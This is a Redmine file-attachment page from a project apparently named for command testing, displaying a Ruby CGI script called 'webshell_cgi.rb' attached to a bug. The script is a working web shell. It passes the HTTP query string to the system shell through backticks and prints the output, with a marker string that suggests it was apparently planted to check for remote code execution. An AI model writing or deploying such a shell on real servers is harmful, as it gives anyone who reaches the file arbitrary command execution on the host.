⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
cmdtest1782618771
All Projects
cmdtest1782618771
Overview
Activity
Issues
Documents
Wiki
Files
Repository
Download (147 Bytes)
Bug #75
ยป webshell_cgi.rb
Redmine Admin
, 07/16/2026 08:40 AM
#!/usr/bin/env ruby
puts
"Content-Type: text/plain
\r\n\r\n
"
cmd
=
ENV
[
'QUERY_STRING'
]
||
''
puts
"RCE_TEST_CGI_RB"
puts
`
#{
cmd
}
`
unless
cmd
.
empty?
(1-1/1)
Loading...